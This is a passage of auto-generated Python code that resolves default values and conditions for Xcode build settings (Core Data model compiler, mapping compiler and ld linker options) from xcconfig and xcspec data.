(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue(xcconfigs, id_configs):
# donothing
return (False, "donothing")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue(xcconfigs, id_configs):
# $(MOMC_OUTPUT_SUFFIX_$(InputFileSuffix))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "InputFileSuffix"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "MOMC_OUTPUT_SUFFIX_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue(xcconfigs, id_configs):
# .momd
return (False, ".momd")
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue(xcconfigs, id_configs):
# .mom
return (False, ".mom")
def _com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_LD) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue(xcconfigs, id_configs):
# $(CURRENT_ARCH)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_ARCH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_LD) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__arch__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_LD) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue(xcconfigs, id_configs):
# $(LINK_FILE_LIST_$(variant)_$(arch))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "variant"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "arch"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "LINK_FILE_LIST_{eval_val_0}_{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1)
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, eval_val_2)
def _com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition(xcconfigs, id_configs):
# $(SEPARATE_SYMBOL_EDIT) == NO
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SEPARATE_SYMBOL_EDIT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition(xcconfigs, id_configs):
# $(SEPARATE_SYMBOL_EDIT) == NO
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SEPARATE_SYMBOL_EDIT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition(xcconfigs, id_configs):
# $(variant) == profile
used_user_content = False
eval_val_0 = ""
eval_key_0 = "variant"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "profile"))
def _com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) == mh_dylib
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "mh_dylib"))
def _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue(xcconfigs, id_configs):
# $(TARGET_TEMP_DIR)/$(PRODUCT_NAME)-LinkMap-$(CURRENT_VARIANT)-$(CURRENT_ARCH).txt
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TARGET_TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "CURRENT_VARIANT"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "CURRENT_ARCH"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-LinkMap-{eval_val_2}-{eval_val_3}.txt".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_3 = eval_val_3))
def _com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_LD) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "mh_object"))
def _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0))
def _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue(xcconfigs, id_configs):
# $(OBJECT_FILE_DIR_$(CURRENT_VARIANT))/$(CURRENT_ARCH)/$(PRODUCT_NAME)_lto.o
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_VARIANT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CURRENT_ARCH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "PRODUCT_NAME"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "OBJECT_FILE_DIR_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_3}/{eval_val_1}/{eval_val_2}_lto.o".format(eval_val_3 = eval_val_3, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition(xcconfigs, id_configs):
# $(GCC_OPTIMIZATION_LEVEL) == '0'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "0"))
def _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue(xcconfigs, id_configs):
# $(OBJC_ABI_VERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "OBJC_ABI_VERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
# $(BITCODE_GENERATION_MODE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BITCODE_GENERATION_MODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode"))
def _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode"))
def _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# $(HIDE_BITCODE_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "HIDE_BITCODE_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode && $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "MACH_O_TYPE"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode" and eval_val_2 != "mh_object"))
def _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue(xcconfigs, id_configs):
